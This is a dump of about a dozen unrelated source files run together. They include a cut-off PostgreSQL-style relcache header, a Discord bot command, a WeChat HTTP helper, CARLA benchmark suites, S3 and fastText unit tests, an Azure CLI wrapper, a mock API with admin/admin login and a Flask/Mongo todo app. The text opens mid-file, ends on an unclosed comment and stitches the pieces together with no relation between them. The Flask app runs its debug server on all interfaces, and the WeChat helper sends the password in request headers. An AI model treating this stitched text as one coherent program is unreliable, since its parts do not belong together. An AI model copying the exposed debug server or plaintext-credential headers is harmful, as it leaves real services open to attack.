* Name of relcache init file(s), used to speed up backend startup
*/
#define RELCACHE_INIT_FILENAME "pg_internal.init"
typedef struct RelationData *Relation;
/* ----------------
* RelationPtr is used in the executor to support index scans
* where we have to keep track of several index relations in an
* array. -cim 9/10/89
* ----------------
*/
typedef Relation *RelationPtr;
/*
* Routines to open (lookup) and close a relcache entry
*/
extern Relation RelationIdGetRelation(Oid relationId);
extern void RelationClose(Relation relation);
/*
* Routines to compute/retrieve additional cached information
*/
extern List *RelationGetFKeyList(Relation relation);
extern List *RelationGetIndexList(Relation relation);
extern List *RelationGetStatExtList(Relation relation);
extern Oid RelationGetOidIndex(Relation relation);
extern Oid RelationGetPrimaryKeyIndex(Relation relation);
extern Oid RelationGetReplicaIndex(Relation relation);
extern List *RelationGetIndexExpressions(Relation relation);
extern List *RelationGetIndexPredicate(Relation relation);
typedef enum IndexAttrBitmapKind
{
INDEX_ATTR_BITMAP_HOT,
INDEX_ATTR_BITMAP_PROJ,
INDEX_ATTR_BITMAP_KEY,
INDEX_ATTR_BITMAP_PRIMARY_KEY,
INDEX_ATTR_BITMAP_IDENTITY_KEY
} IndexAttrBitmapKind;
extern Bitmapset *RelationGetIndexAttrBitmap(Relation relation,
IndexAttrBitmapKind keyAttrs);
extern void RelationGetExclusionInfo(Relation indexRelation,
Oid **operators,
Oid **procs,
uint16 **strategies);
extern void RelationSetIndexList(Relation relation,
List *indexIds, Oid oidIndex);
extern void RelationInitIndexAccessInfo(Relation relation);
/* caller must include pg_publication.h */
struct PublicationActions;
extern struct PublicationActions *GetRelationPublicationActions(Relation relation);
/*
* Routines to support ereport() reports of relation-related errors
*/
extern int errtable(Relation rel);
extern int errtablecol(Relation rel, int attnum);
extern int errtablecolname(Relation rel, const char *colname);
extern int errtableconstraint(Relation rel, const char *conname);
/*
* Routines for backend startup
*/
extern void RelationCacheInitialize(void);
extern void RelationCacheInitializePhase2(void);
extern void RelationCacheInitializePhase3(void);
extern void K2PgPreloadRelCache();
/*
* Routine to create a relcache entry for an about-to-be-created relation
*/
extern Relation RelationBuildLocalRelation(const char *relname,
Oid relnamespace,
TupleDesc tupDesc,
Oid relid,
Oid relfilenode,
Oid reltablespace,
bool shared_relation,
bool mapped_relation,
char relpersistence,
char relkind);
/*
* Routine to manage assignment of new relfilenode to a relation
*/
extern void RelationSetNewRelfilenode(Relation relation, char persistence,
TransactionId freezeXid, MultiXactId minmulti);
/*
* Routines for flushing/rebuilding relcache entries in various scenarios
*/
extern void RelationForgetRelation(Oid rid);
extern void RelationCacheInvalidateEntry(Oid relationId);
extern void RelationCacheInvalidate(void);
extern void RelationCloseSmgrByOid(Oid relationId);
extern void AtEOXact_RelationCache(bool isCommit);
extern void AtEOSubXact_RelationCache(bool isCommit, SubTransactionId mySubid,
SubTransactionId parentSubid);
/*
* Routines to help manage rebuilding of relcache init files
*/
extern bool RelationIdIsInInitFile(Oid relationId);
extern void RelationCacheInitFilePreInvalidate(void);
extern void RelationCacheInitFilePostInvalidate(void);
extern void RelationCacheInitFileRemove(void);
/* should be used only by relcache.c and catcache.c */
extern bool criticalRelcachesBuilt;
/* should be used only by relcache.c and postinit.c */
extern bool criticalSharedRelcachesBuilt;
#endif /* RELCACHE_H */
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Helper proxy to the state object."""
from __future__ import absolute_import, print_function
from flask import current_app
from werkzeug.local import LocalProxy
current_app_ils = LocalProxy(
lambda: current_app.extensions['invenio-app-ils']
)
"""Helper proxy to get the current App ILS extension."""
|
const db = require("quick.db");
const Discord = require("discord.js")
module.exports = {
name: "role-all",
aliases: ["ra", "all-role"],
execute: async(client, message, args) => {
if (message.member.hasPermission("MANAGE_SERVER")) {
var role1 = message.mentions.roles.first().id;
if(!role1)
{
var role1 = args[0];
}
let role2 = message.guild.roles.cache.get(`${role1}`);
message.guild.members.cache.forEach(member => member.roles.add(role2))
message.reply("Done It will be running in background")
}
}
}
module.exports.help = {
name: "roleall",
description: "It Gves your given role to all members of the server",
usage: "roleall",
type: "Moderation"
} |
const helperIseDeclarations = {};
helperIseDeclarations["ka"] = require("./array_helpers/ka.js");
helperIseDeclarations["siLetaNla"] = require("./string_helpers/si_leta_nla.js");
helperIseDeclarations["siLetaKekere"] = require("./string_helpers/si_leta_kekere.js");
helperIseDeclarations["waNinu"] = require("./string_helpers/wa_ni_nu.js");
helperIseDeclarations["fiRopo"] = require("./string_helpers/fi_ro_po.js");
helperIseDeclarations["teSibi"] = require("./input_output/tesibi.js");
helperIseDeclarations["aago"] = require("./datetime_helpers/aago.js");
helperIseDeclarations["yipo"] = require("./random_helpers/yipo.js");
module.exports = helperIseDeclarations;
|
import config from './config';
import md5 from './md5';
export default class Http {
axios({ url, data = {}, method = 'GET' }) {
wx.showLoading({
title: 'Loading...',
mask: true,
});
let { sign, timestamp } = this.getSign();
// console.log(sign);
// console.log(timestamp);
return new Promise((resolve, reject) => {
wx.request({
url: config.domain + url,
data,
method,
header: {
'username': config.username,
'password': config.password,
sign,
timestamp
},
success: res => resolve(res.data),
fail: err => reject(err),
complete: () => {
wx.hideLoading();
}
});
})
}
upLoadFile({ url, filePath, name = "file" }) {
let { sign, timestamp } = this.getSign();
return new Promise((resolve, reject) => {
wx.uploadFile({
url: config.domain + url,
header: {
username: config.username,
password: config.password,
sign,
timestamp
},
filePath,
name,
success: res => resolve(res.data)
})
})
}
getSign() {
let username = config.username;
let password = config.password;
let token = config.token;
let timestamp = new Date().getTime();
let sign = md5(username + token + password + timestamp);
return {
sign,
timestamp
}
}
} |
VERSION = '099'
WEATHER_1 = [1, 3, 6, 8] # train
WEATHER_2 = [4, 14] # test
WEATHER_3 = [10, 14]
WEATHER_4 = [1, 8, 14] # validate
ALL_SUITES = dict()
def _add(suite_name, *args, **kwargs):
assert suite_name not in ALL_SUITES, '%s is already registered!' % suite_name
town = None
if 'Town01' in suite_name:
town = 'Town01'
elif 'Town02' in suite_name:
town = 'Town02'
elif 'Town04' in suite_name:
town = 'Town04'
else:
raise Exception('No town specified: %s.' % suite_name)
benchmark = 'carla100' if 'NoCrash' in suite_name else 'corl2017'
suite = None
if 'Turn' in suite_name:
suite = 'turn'
elif 'Straight' in suite_name:
suite = 'straight'
elif 'ChangeLane' in suite_name:
suite = 'changelane'
elif 'Full' in suite_name:
suite = 'full'
elif 'NoCrash' in suite_name:
suite = 'nocrash'
else:
raise Exception('No suite specified: %s.' % suite_name)
kwargs['town'] = town
kwargs['poses_txt'] = '%s/%s/%s_%s.txt' % (benchmark, VERSION, suite, town)
kwargs['col_is_failure'] = 'NoCrash' in suite_name
ALL_SUITES[suite_name] = (args, kwargs)
# ============= Register Suites ============ ##
# _add('DebugTown01-v0', DebugSuite, n_vehicles=10, viz_camera=True)
# _add('FullTown01-v0', n_vehicles=0, viz_camera=True)
# _add('FullTown02-v0', n_vehicles=0, viz_camera=True)
# data collection town; no respawn to prevent missing frames
_add('FullTown01-v0', n_vehicles=0, weathers=WEATHER_1, respawn_peds=False)
# Train town, train weathers.
_add('FullTown01-v1', n_vehicles=0, weathers=WEATHER_1)
_add('StraightTown01-v1', n_vehicles=0, weathers=WEATHER_1)
_add('TurnTown01-v1', n_vehicles=0, weathers=WEATHER_1)
_add('FullTown04-v1', n_vehicles=0, weathers=WEATHER_1)
_add('StraightTown04-v1', n_vehicles=0, weathers=WEATHER_1)
_add('ChangeLaneTown04-v1', n_vehicles=0, weathers=WEATHER_1)
# Train town, test weathers.
_add('FullTown01-v2', n_vehicles=0, weathers=WEATHER_2)
_add('StraightTown01-v2', n_vehicles=0, weathers=WEATHER_2)
_add('TurnTown01-v2', n_vehicles=0, weathers=WEATHER_2)
_add('FullTown04-v2', n_vehicles=0, weathers=WEATHER_2)
_add('StraightTown04-v2', n_vehicles=0, weathers=WEATHER_2)
_add('ChangeLaneTown04-v2', n_vehicles=0, weathers=WEATHER_2)
# Train town, more vehicles
_add('FullTown01-v3', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_1)
_add('FullTown01-v4', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_2)
_add('FullTown04-v3', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_1)
_add('FullTown04-v4', n_vehicles=20, n_pedestrians=50, weathers=WEATHER_2)
# No ped versions
_add('FullTown01-v3-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_1)
_add('FullTown01-v4-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_2)
_add('FullTown04-v3-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_1)
_add('FullTown04-v4-np', n_vehicles=20, n_pedestrians=0, weathers=WEATHER_2)
# Test town, train weathers.
_add('FullTown02-v1', n_vehicles=0, weathers=WEATHER_1)
_add('StraightTown02-v1', n_vehicles=0, weathers=WEATHER_1)
_add('TurnTown02-v1', n_vehicles=0, weathers=WEATHER_1)
# Test town, test weathers.
_add('FullTown02-v2', n_vehicles=0, weathers=WEATHER_2)
_add('StraightTown02-v2', n_vehicles=0, weathers=WEATHER_2)
_add('TurnTown02-v2', n_vehicles=0, weathers=WEATHER_2)
# Test town, more vehicles.
_add('FullTown02-v3', n_vehicles=15, n_pedestrians=50, weathers=WEATHER_1)
_add('FullTown02-v4', n_vehicles=15, n_pedestrians=50, weathers=WEATHER_2)
# No ped versions
_add('FullTown02-v3-np', n_vehicles=15, n_pedestrians=0, weathers=WEATHER_1)
_add('FullTown02-v4-np', n_vehicles=15, n_pedestrians=0, weathers=WEATHER_2)
_add('NoCrashTown01-v1', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_1)
_add('NoCrashTown01-v2', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_3)
_add('NoCrashTown01-v3', n_vehicles=20, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_1)
_add('NoCrashTown01-v4', n_vehicles=20, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_3)
_add('NoCrashTown01-v5', n_vehicles=100, disable_two_wheels=True, n_pedestrians=250, weathers=WEATHER_1)
_add('NoCrashTown01-v6', n_vehicles=100, disable_two_wheels=True, n_pedestrians=250, weathers=WEATHER_3)
# No ped versions
_add('NoCrashTown01-v3-np', n_vehicles=20, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown01-v4-np', n_vehicles=20, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
_add('NoCrashTown01-v5-np', n_vehicles=100, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown01-v6-np', n_vehicles=100, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
_add('NoCrashTown02-v1', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_1)
_add('NoCrashTown02-v2', n_vehicles=0, disable_two_wheels=True, weathers=WEATHER_3)
_add('NoCrashTown02-v3', n_vehicles=15, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_1)
_add('NoCrashTown02-v4', n_vehicles=15, disable_two_wheels=True, n_pedestrians=50, weathers=WEATHER_3)
_add('NoCrashTown02-v5', n_vehicles=70, disable_two_wheels=True, n_pedestrians=150, weathers=WEATHER_1)
_add('NoCrashTown02-v6', n_vehicles=70, disable_two_wheels=True, n_pedestrians=150, weathers=WEATHER_3)
# No ped versions
_add('NoCrashTown02-v3-np', n_vehicles=15, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown02-v4-np', n_vehicles=15, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
_add('NoCrashTown02-v5-np', n_vehicles=70, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_1)
_add('NoCrashTown02-v6-np', n_vehicles=70, disable_two_wheels=True, n_pedestrians=0, weathers=WEATHER_3)
# Demo
_add('NoCrashTown01-v7', n_vehicles=100, n_pedestrians=250, weathers=WEATHER_1)
_add('NoCrashTown01-v8', n_vehicles=100, n_pedestrians=250, weathers=WEATHER_2)
_add('NoCrashTown02-v7', n_vehicles=70, n_pedestrians=150, weathers=WEATHER_1)
_add('NoCrashTown02-v8', n_vehicles=70, n_pedestrians=150, weathers=WEATHER_2)
# Weather primes.
_add('FullTown01-v5', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown01-v6', n_vehicles=20, weathers=WEATHER_4)
_add('StraightTown01-v3', n_vehicles=0, weathers=WEATHER_4)
_add('TurnTown01-v3', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown04-v5', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown04-v6', n_vehicles=20, weathers=WEATHER_4)
_add('StraightTown04-v3', n_vehicles=0, weathers=WEATHER_4)
_add('ChangeLaneTown04-v3', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown02-v5', n_vehicles=0, weathers=WEATHER_4)
_add('FullTown02-v6', n_vehicles=15, weathers=WEATHER_4)
_add('StraightTown02-v3', n_vehicles=0, weathers=WEATHER_4)
_add('TurnTown02-v3', n_vehicles=0, weathers=WEATHER_4)
# Random
_add('NoCrashTown01_noweather_empty', weathers=[1], n_vehicles=0)
_add('NoCrashTown01_noweather_regular', weathers=[1], n_vehicles=20, n_pedestrians=50)
_add('NoCrashTown01_noweather_dense', weathers=[1], n_vehicles=100, n_pedestrians=250)
_add('NoCrashTown02_noweather_empty', weathers=[1], n_vehicles=0)
_add('NoCrashTown02_noweather_regular', weathers=[1], n_vehicles=15, n_pedestrians=50)
_add('NoCrashTown02_noweather_dense', weathers=[1], n_vehicles=70, n_pedestrians=200)
_add('StraightTown01-noweather', n_vehicles=0, weathers=[1])
_add('TurnTown01-noweather', n_vehicles=0, weathers=[1])
_add('FullTown01-noweather-nav', n_vehicles=0, weathers=[1])
_add('FullTown01-noweather', n_vehicles=20, weathers=[1])
_add('StraightTown02-noweather', n_vehicles=0, weathers=[1])
_add('TurnTown02-noweather', n_vehicles=0, weathers=[1])
_add('FullTown02-noweather-nav', n_vehicles=0, weathers=[1])
_add('FullTown02-noweather', n_vehicles=15, weathers=[1])
ALL_SUITES_ALIASES = {
'town1': [
'FullTown01-v1', 'FullTown01-v2', 'FullTown01-v3', 'FullTown01-v4', 'StraightTown01-v1', 'StraightTown01-v2',
'TurnTown01-v1', 'TurnTown01-v2'
],
'town2': [
'FullTown02-v1', 'FullTown02-v2', 'FullTown02-v3', 'FullTown02-v4', 'StraightTown02-v1', 'StraightTown02-v2',
'TurnTown02-v1', 'TurnTown02-v2'
],
'town4': [
'FullTown04-v1', 'FullTown04-v2', 'FullTown04-v3', 'FullTown04-v4', 'StraightTown04-v1', 'StraightTown04-v2',
'ChangeLaneTown04-v1', 'ChangeLaneTown04-v2'
],
'train': ['FullTown01-v1', 'StraightTown01-v1', 'TurnTown01-v1'],
'train_multilane': ['FullTown04-v1', 'StraightTown04-v1', 'ChangeLaneTown04-v1'],
'train_ft': ['FullTown01-v1', 'TurnTown01-v1'],
'train_veh': ['FullTown01-v1', 'FullTown01-v3'],
'validate': ['FullTown01-v5', 'FullTown02-v5'],
'test': ['FullTown02-v2', 'StraightTown02-v1', 'TurnTown02-v1'],
'test_veh': ['FullTown02-v2', 'FullTown02-v4'],
'town1p': [
'FullTown01-v5',
'FullTown01-v6',
'StraightTown01-v3',
'TurnTown01-v3',
'FullTown01-v5',
'FullTown01-v6',
],
'town2p': [
'FullTown02-v5',
'FullTown02-v6',
'StraightTown02-v3',
'TurnTown02-v3',
'FullTown02-v5',
'FullTown02-v6',
],
'ntown1p': [
'NoCrashTown01-v7',
'NoCrashTown01-v8',
'NoCrashTown01-v9',
],
'ntown2p': [
'NoCrashTown02-v7',
'NoCrashTown02-v8',
'NoCrashTown02-v9',
],
'empty': [
'NoCrashTown01-v1',
'NoCrashTown01-v2',
'NoCrashTown02-v1',
'NoCrashTown02-v2',
],
'regular': [
'NoCrashTown01-v3',
'NoCrashTown01-v4',
'NoCrashTown02-v3',
'NoCrashTown02-v4',
],
'regular-np': [
'NoCrashTown01-v3-np',
'NoCrashTown01-v4-np',
'NoCrashTown02-v3-np',
'NoCrashTown02-v4-np',
],
'dense': [
'NoCrashTown01-v5',
'NoCrashTown01-v6',
'NoCrashTown02-v5',
'NoCrashTown02-v6',
],
'dense-np': [
'NoCrashTown01-v5-np',
'NoCrashTown01-v6-np',
'NoCrashTown02-v5-np',
'NoCrashTown02-v6-np',
]
}
ALL_SUITES_ALIASES['all'] = ALL_SUITES_ALIASES['town1'] + \
ALL_SUITES_ALIASES['town2']
|
import unittest
import os
import boto3
from darty.drivers.abstract import VersionExistsError, PackageNotFoundError
from darty.drivers.s3.files.driver import S3FilesDriver
from darty.drivers.s3.zip.driver import S3ZipDriver
from moto import mock_s3
from darty.output_writer import NullOutputWriter
from shutil import rmtree
def list_dir_files(dir_path):
for cur_dir, directories, filenames in os.walk(dir_path):
rel_dir = os.path.relpath(cur_dir, dir_path)
for filename in filenames:
yield os.path.join(rel_dir, filename)
class TestDrivers(unittest.TestCase):
@mock_s3
def test_upload_and_download(self):
for driver_class in [S3FilesDriver, S3ZipDriver]:
# create a test bucket
bucket_name = 'test-bucket-%s' % driver_class.__name__
s3 = boto3.resource('s3')
s3.create_bucket(Bucket=bucket_name)
driver = driver_class(bucket_name, {})
# upload test package
pkg1_path = os.path.join(os.path.dirname(__file__), 'data', 'packages', 'package1')
driver.upload_package('group1', 'artifact1', '1.1', pkg1_path, output=NullOutputWriter())
# upload the same package second time (raises an exception)
with self.assertRaises(VersionExistsError):
driver.upload_package('group1', 'artifact1', '1.1', pkg1_path, output=NullOutputWriter())
# create a folder for downloaded package
downloaded_pkg_path = os.path.join(os.path.dirname(__file__), 'data', 'packages', 'downloaded')
rmtree(downloaded_pkg_path, ignore_errors=True)
os.makedirs(downloaded_pkg_path, exist_ok=True)
# download the package
driver.download_package('group1', 'artifact1', '1.1', downloaded_pkg_path, output=NullOutputWriter())
orig_files = list(list_dir_files(pkg1_path))
downloaded_files = list(list_dir_files(downloaded_pkg_path))
self.assertEqual(orig_files, downloaded_files)
rmtree(downloaded_pkg_path, ignore_errors=True)
# download not-existing package (raises an exception)
with self.assertRaises(PackageNotFoundError):
driver.download_package('group1', 'artifact_doesnt_exist', '1.0', downloaded_pkg_path,
output=NullOutputWriter())
if __name__ == '__main__':
unittest.main()
|
from dataclasses import dataclass
from datetime import datetime
@dataclass
class CurrencyTradeVolumeRecord:
time: datetime
currency_pair: str
volume: float
|
'''
Manage partner namespaces.
'''
from .... pyaz_utils import _call_az
from . import event_channel, key
def show(name, resource_group):
'''
Get the details of a partner namespace.
Required Parameters:
- name -- Name of the partner namespace.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az eventgrid partner namespace show", locals())
def delete(name, resource_group, yes=None):
'''
Delete a partner namespace.
Required Parameters:
- name -- Name of the partner namespace.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- yes -- Do not prompt for confirmation.
'''
return _call_az("az eventgrid partner namespace delete", locals())
def list(odata_query=None, resource_group=None):
'''
List available partner namespaces.
Optional Parameters:
- odata_query -- The OData query used for filtering the list results. Filtering is currently allowed on the Name property only. The supported operations include: CONTAINS, eq (for equal), ne (for not equal), AND, OR and NOT.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az eventgrid partner namespace list", locals())
def create(name, partner_registration_id, resource_group, location=None, tags=None):
'''
Create a partner namespace.
Required Parameters:
- name -- Name of the partner namespace.
- partner_registration_id -- The fully qualified ARM Id of the partner registration that should be associated with this partner namespace. This takes the following format: /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/partnerRegistrations/{partnerRegistrationName}.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- location -- Location. Values from: `az account list-locations`. You can configure the default location using `az configure --defaults location=<location>`.
- tags -- space-separated tags: key[=value] [key[=value] ...]. Use '' to clear existing tags.
'''
return _call_az("az eventgrid partner namespace create", locals())
|
(function () {
'use strict';
angular
.module('traces.services')
.factory('TracesService', TracesService);
TracesService.$inject = ['$resource'];
function TracesService($resource) {
return $resource('/api/traces/:traceId', {
traceId: '@_id'
}, {
update: {
method: 'PUT'
}
});
}
}());
|
import { Fetch } from './Fetch';
import MockAdapter from 'axios-mock-adapter';
export class BBBSApi extends Fetch {
constructor(baseURL, options = {}) {
super(baseURL, options);
if (Object.prototype.hasOwnProperty.call(options, 'mock') && options.mock) {
this._initMock();
}
this._checkAuth();
}
async _checkAuth() {
const jwtJson = localStorage.getItem('bbbs-jwt');
if (jwtJson) {
const { access } = await JSON.parse(jwtJson);
if (access) {
this._setAuthHeader(access);
}
}
}
_initMock() {
this._mock = new MockAdapter(this._instance, { delayResponse: 1500 });
// Главная страница
this._mock.onGet('/main').reply(200, require('../mock/mainPage.json'));
// Авторизация. Проверяется логин и пароль
this._mock.onPost('/api/v1/token').reply(async (config) => {
const { username, password } = await JSON.parse(config.data);
if (username === 'admin' && password === 'admin') {
return [200, require('../mock/token.json')];
} else {
return [400, { message: 'Неверный логин или пароль' }];
}
});
// Получение списка городов
this._mock
.onGet('/api/v1/cities')
.reply(200, require('../mock/cities.json'));
// Получение - обновление профайла пользователя, текущего города пользователя и т.д.
this._mock.onGet('/api/v1/profile').reply(async (config) => {
const { access } = require('../mock/token.json');
if (!config.headers.Authorization) {
return [401, { message: 'Не авторизован' }];
} else if (config.headers.Authorization !== `Bearer ${access}`) {
return [403, { message: 'Нет доступа' }];
} else {
return [200, require('../mock/userData.json')];
}
});
// Работа с календарем
this._mock
.onGet('/api/v1/afisha/events/2')
.reply(200, require('../mock/calendar.json'));
}
login({ username, password }) {
return this._instance
.post('/api/v1/token', { username, password })
.then(this._returnResponse)
.then((tokens) => {
const { access } = tokens;
if (access) {
this._setAuthHeader(access);
}
return tokens;
});
}
getMainPage() {
return this._instance.get('/main').then(this._returnResponse);
}
getCities() {
return this._instance.get('/api/v1/cities/').then(this._returnResponse);
}
getUserProfile() {
return this._instance.get('/api/v1/profile').then(this._returnResponse);
}
getEvents(cityId) {
return this._instance
.get(`/api/v1/afisha/events/${cityId}`)
.then(this._returnResponse);
}
}
|
#!/usr/bin/python
import time
from flask import Flask, jsonify, request
from flask_pymongo import PyMongo, ObjectId
app = Flask(__name__)
app.config["MONGO_URI"] = "mongodb://todo-db-0.todo-db,todo-db-1.todo-db,todo-db-2.todo-db:27017"
app.config["MONGO_DBNAME"] = "tasks"
mongo = PyMongo(app)
START = time.time()
def elapsed():
running = time.time() - START
minutes, seconds = divmod(running, 60)
hours, minutes = divmod(minutes, 60)
return "%d:%02d:%02d" % (hours, minutes, seconds)
@app.route('/', methods=["GET"])
def root():
result = mongo.db.tasks.find(projection={"_id": False})
time.sleep(0.5)
return jsonify({"status": "ok",
"tasks": list(result)})
@app.route('/<tag>', methods=["POST"])
def add(tag):
result = mongo.db.tasks.insert_one({"tag": tag, "task": request.json})
return jsonify({"status": "ok", "id": str(result.inserted_id)})
@app.route('/<tag>', methods=["GET"])
def get(tag):
result = list(mongo.db.tasks.find({"tag": tag}, projection={"_id": False}))
if result:
return jsonify(result[0])
else:
return ('Tag not found: %s\n' % tag, 404)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)
|
require("dotenv").config({
path: `.env.${process.env.NODE_ENV}`,
});
const contentfulConfig = {
spaceId: process.env.CONTENTFUL_SPACE_ID,
accessToken:
process.env.CONTENTFUL_ACCESS_TOKEN ||
process.env.CONTENTFUL_DELIVERY_TOKEN,
};
// If you want to use the preview API please define
// CONTENTFUL_HOST and CONTENTFUL_PREVIEW_ACCESS_TOKEN in your
// environment config.
//
// CONTENTFUL_HOST should map to `preview.contentful.com`
// CONTENTFUL_PREVIEW_ACCESS_TOKEN should map to your
// Content Preview API token
//
// For more information around the Preview API check out the documentation at
// https://www.contentful.com/developers/docs/references/content-preview-api/#/reference/spaces/space/get-a-space/console/js
//
// To change back to the normal CDA, remove the CONTENTFUL_HOST variable from your environment.
if (process.env.CONTENTFUL_HOST) {
contentfulConfig.host = process.env.CONTENTFUL_HOST;
contentfulConfig.accessToken = process.env.CONTENTFUL_PREVIEW_ACCESS_TOKEN;
}
const { spaceId, accessToken } = contentfulConfig;
if (!spaceId || !accessToken) {
throw new Error(
"Contentful spaceId and the access token need to be provided."
);
}
module.exports = {
siteMetadata: {
title: "Eat The Fat",
},
pathPrefix: "/gatsby-contentful-starter",
plugins: [
"gatsby-transformer-remark",
"gatsby-transformer-sharp",
"gatsby-plugin-react-helmet",
"gatsby-plugin-sharp",
{
resolve: "gatsby-source-contentful",
options: contentfulConfig,
},
'gatsby-plugin-postcss',
{
resolve: `gatsby-plugin-disqus`,
options: {
shortname: `eatthefat`
}
},
],
};
|
"""Unit tests for the fastText backend in Annif"""
import logging
import pytest
import annif.backend
import annif.corpus
from annif.exception import NotSupportedException
fasttext = pytest.importorskip("annif.backend.fasttext")
def test_fasttext_default_params(project):
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={},
project=project)
expected_default_params = {
'limit': 100,
'chunksize': 1,
'dim': 100,
'lr': 0.25,
'epoch': 5,
'loss': 'hs',
}
actual_params = fasttext.params
for param, val in expected_default_params.items():
assert param in actual_params and actual_params[param] == val
def test_fasttext_train(document_corpus, project, datadir):
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs'},
project=project)
fasttext.train(document_corpus)
assert fasttext._model is not None
assert datadir.join('fasttext-model').exists()
assert datadir.join('fasttext-model').size() > 0
def test_fasttext_train_cached_jobs(project, datadir):
assert datadir.join('fasttext-train.txt').exists()
datadir.join('fasttext-model').remove()
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs'},
project=project)
fasttext.train("cached", jobs=2)
assert fasttext._model is not None
assert datadir.join('fasttext-model').exists()
assert datadir.join('fasttext-model').size() > 0
def test_fasttext_train_unknown_subject(tmpdir, datadir, project):
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs'},
project=project)
tmpfile = tmpdir.join('document.tsv')
tmpfile.write("nonexistent\thttp://example.com/nonexistent\n" +
"arkeologia\thttp://www.yso.fi/onto/yso/p1265")
document_corpus = annif.corpus.DocumentFile(str(tmpfile))
fasttext.train(document_corpus)
assert fasttext._model is not None
assert datadir.join('fasttext-model').exists()
assert datadir.join('fasttext-model').size() > 0
def test_fasttext_train_nodocuments(project, empty_corpus):
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs'},
project=project)
with pytest.raises(NotSupportedException) as excinfo:
fasttext.train(empty_corpus)
assert 'training backend fasttext with no documents' in str(excinfo.value)
def test_train_fasttext_params(document_corpus, project, caplog):
logger = annif.logger
logger.propagate = True
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 51,
'dim': 101,
'lr': 0.21,
'epoch': 21,
'loss': 'hs'},
project=project)
params = {'dim': 1, 'lr': 42.1, 'epoch': 0}
with caplog.at_level(logging.DEBUG):
fasttext.train(document_corpus, params)
parameters_heading = 'Backend fasttext: Model parameters:'
assert parameters_heading in caplog.text
for line in caplog.text.splitlines():
if parameters_heading in line:
assert "'dim': 1" in line
assert "'lr': 42.1" in line
assert "'epoch': 0" in line
def test_fasttext_train_pretrained(datadir, document_corpus, project,
pretrained_vectors):
assert pretrained_vectors.exists()
assert pretrained_vectors.size() > 0
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs',
'pretrainedVectors': str(pretrained_vectors)},
project=project)
fasttext.train(document_corpus)
assert fasttext._model is not None
assert datadir.join('fasttext-model').exists()
assert datadir.join('fasttext-model').size() > 0
def test_fasttext_train_pretrained_wrong_dim(datadir, document_corpus, project,
pretrained_vectors):
assert pretrained_vectors.exists()
assert pretrained_vectors.size() > 0
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'dim': 50,
'lr': 0.25,
'epoch': 20,
'loss': 'hs',
'pretrainedVectors': str(pretrained_vectors)},
project=project)
with pytest.raises(ValueError):
fasttext.train(document_corpus)
assert fasttext._model is None
def test_fasttext_suggest(project):
fasttext_type = annif.backend.get_backend("fasttext")
fasttext = fasttext_type(
backend_id='fasttext',
config_params={
'limit': 50,
'chunksize': 1,
'dim': 100,
'lr': 0.25,
'epoch': 20,
'loss': 'hs'},
project=project)
results = fasttext.suggest("""Arkeologiaa sanotaan joskus myös
muinaistutkimukseksi tai muinaistieteeksi. Se on humanistinen tiede
tai oikeammin joukko tieteitä, jotka tutkivat ihmisen menneisyyttä.
Tutkimusta tehdään analysoimalla muinaisjäännöksiä eli niitä jälkiä,
joita ihmisten toiminta on jättänyt maaperään tai vesistöjen
pohjaan.""")
assert len(results) > 0
hits = results.as_list(project.subjects)
assert 'http://www.yso.fi/onto/yso/p1265' in [
result.uri for result in hits]
assert 'arkeologia' in [result.label for result in hits]
|
/*
